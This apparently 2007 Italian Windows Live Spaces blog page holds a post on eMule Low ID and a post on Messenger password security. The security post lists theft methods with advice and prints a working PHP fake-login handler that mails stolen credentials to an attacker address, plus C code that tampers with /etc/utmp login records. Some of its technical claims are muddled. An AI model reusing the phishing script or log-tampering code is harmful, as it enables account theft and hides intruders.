Profilo di LA TUA PASSWORD...IL RUBATORE DI PASSWORD!FotoBlogElenchiAltro  |  Strumenti Guida |
IL RUBATORE DI PASSWORD!MI DISP MA LA TUA PASSWORD NN è + AL SICURO CON ME! |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
Manuali unici da leggere - consigliati agli appassionati!
Welcome in my Windows Live Space!
10 agosto ID Alto in eMuleChi di noi non usa quello che ormai è diventato il nostro supermercato personale, eMule? Ormai il mulo è entrato in ogni PC del mondo, dopo aver strappato il primo posto delle classifiche a Kazaa.
Uno dei primi problemi che eMule (attualmente arrivato alla versione 0.48a) può dare all'utente è l'ID Basso. Descriviamo questo problema altamente fastidioso, che in alcuni casi può portarvi all'esaurimento nervoso (io ci stavo arrivando per poterlo sistemare...)... l'ID è un identificatore. Per chi ha avuto modo di programmare ad esempio in CSS, sa che l'ID è un tipo di selettore. In eMule, l'ID è una serie di numeri che corrispondono alla posizione del vostro client in una lista di client. Avere un ID Basso, quindi, significa essere tra gli ultimi di questa lista, e quindi col tempo che impiegherete per scaricare un file potreste divenire un Matusalemme... Ma come risolvere questo problema? Di seguito analizzeremo due casi:
Vediamo il primo caso, che è quello più diffuso.
Adesso attenzioniamo il secondo caso, che si manifesta in quelle situazioni in cui un PC debba ricorrere ad un altro PC che gli funge da server. Nozioni base di sicurezza per Windows Live MessengerSecondo una statistica, di cui non ricordo mai la provenienza, il primo programma instant-messaging utilizzato in tutto il mondo é Windows Live Messenger di casa Microsoft, seguito da Yahoo! Messenger. Proprio perché é il più usato, Windows Live Messenger é anche quello più soggetto a malintenzionati che vogliono ribare la password altrui, ma come fare a tenersi al riparo da questi ritardati mentali? Ecco i modi che un utente può utilizzare per riuscire a prendervi la password: 1) tramite una chiavetta USB, l'utente può avviare un programma, spesso di tipo sniffer o spoofing, che capta le password. SOLUZIONE: non memorizzare mai la password nel PC; 2) utilizzando un attacco che gli hacker chiamano brute force, ovvero forza bruta, e proprio perché é un attacco di forza bruta l'utente tira ad indovinare. SOLUZIONE: usate una password che contenga numeri, lettere e caratteri speciali. Eccone una: ]}°òPò876§§§@[*}; 3) tramite la domanda segreta, utilizzata in tutti quei casi l'utente si dimentichi la password (SOLUZIONE: vi serve più fosforo). Infatti il malintenzionato può tentare di indovinare la risposta alla domanda, specialmente se vi conosce. SOLUZIONE: aggiungete alla fine della risposta una parola senza senso che non c'entri nulla col resto della risposta; 4) utilizzando il social engineering: molti utenti si creano indirizzi e-mail del tipo msn_staff@hotmail.it o supporto@hotmail.it, vi inseriscono tra i loro contatti e vi convincono di dargi la password e l'indirizzo e-mail poiché sono in corso degli aggiornamenti nei loro database. SOLUZIONE: state alla larga da questi contatti; 5) usando programmi come Messenger Pass, il Keylogger o addirittura l'apparente innocuo RockXP; 6) usando il Cookie Grabbing, che é semplicemente indistruttibile, ma siccome é stato fixato il bug che tale tecnica usufruiva é, attualmente, inutilizzabile, ma se dovessero risistemarlo, non avrete scampo. SOLUZIONE: eliminate tutti i cookie dopo ogni navigazione ed utilizzate ripulitori di sistema ed antivirus a volontà; 7) usando exploit, ovvero dei programmi backdoor che inserendosi nel server di Hotmail ruba le password a bizzeffe. Ad esempio un codice sorgente di una backdoor (in ambiente UNIX) é il seguente: CODICE
-= INIZIO CODICE =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #include <stdio.h> #include <fcntl.h> #include <sys/types.h> #include <utmp.h> #include <sys/stat.h> struct utmp *user; char *usrt; main (argc,argv) int argc; char *argv[]; { int fatto=0, cnt=0, start=1, index=0; char err[80]; if (argc == 1) printf("Removing you from utmp\n"); if (argc == 2) printf("Changing your login to %s\n",argv[1]); utmpname("/etc/utmp"); usrt = strrchr(ttyname(0),'/'); strcpy(usrt,++usrt); while (fatto != 1) { user = getutent(); cnt++; if (strcmp(user->ut_line,usrt) == 0) fatto=1; } utmpname("/etc/utmp"); for (start=0; start<cnt; start++) { user = getutent(); } if (argc == 1) { user->ut_type = LOGIN_PROCESS; strcpy(user->ut_name,"LOGIN"); } else user->ut_type = USER_PROCESS; if (argc == 2) strcpy(user->ut_name,argv[1]); pututline(user); endutent(); } -= FINE CODICE =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- SOLUZIONE: utilizzate un buon Firewall ed eventualmente un buon router/modem; 8) usando un fake login, ovvero utilizzare una pagina HTML identica a quella originale in cui eseguiamo il Log In nella nostra e-mail box di Hotmail, ma che invia la password ad un indirizzo di posta elettronica. Tutto si basa sull'uso di un file in PHP, di cui sono riuscito a trovarne il codice sorgente: CODICE
<? /////////////////////////////////// $yourmail = "mioaccount@mail.it"; //QUI E' DOVE VIENE MESSO L'INDIRIZZO DI POSTA ELETTRONICA DEL MALINTENZIONATO /////////////////////////////////// // COMMENTI NON INSERITI if (getenv(HTTP_X_FORWARDED_FOR)){ $ip = getenv(HTTP_X_FORWARDED_FOR); } else { $ip = getenv(REMOTE_ADDR); } $useragent=$_SERVER['HTTP_USER_AGENT']; $td = date("F jS"); $date = date("d M, Y"); $time = date("g:i a"); $LogTime = trim(" Date: ".$date.", Time: ".$time); mail("$yourmail", "Account $account", "Username: $account \nPassword: $password \n\nIndirizzo ip: $ip \nData log: $LogTime \nSystem Info: $useragent \n\nCoder SNaKE\nwww.myhackerzone.altervista.org","from: $account <$account>"); header( "Location: https://login.passport.net/uilogin.srf?lc=1040&id=2"); ?> SOLUZIONE: non loggatevi mai in siti Web che non siano di proprietà della MSN. 18 luglio Aggiornamento settimanale del 18 luglio 2007Aggiornamento settimanale del
18 luglio 2007
I moduli elenchi, Feed RSS ed ATOM sono stati aggiornati con successo.
..:Kamui The Best:.. 02 luglio Aggiornamento settimanale del 2 luglio 200Aggiornamento settimanale del
2 luglio 2007
Chiedo scusa per la mia mancanza durante questi mesi. In particolare chiedo scusa a gaetano ferraro per non aver potuto rispondere alla sua e-mail
..:Kamui The Best:..
14 aprile Aggiornamento mensile del 14 aprile 2007Aggiornamento mensile del
14 aprile 2007
..:Kamui The Best:.. |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Invia un messaggio privato
Sottoscrivi RSS
Dillo a un amico
Aggiungi a My MSN
Aggiungi alla tua rete di amici
Iscriviti al servizio Alerts
|
|
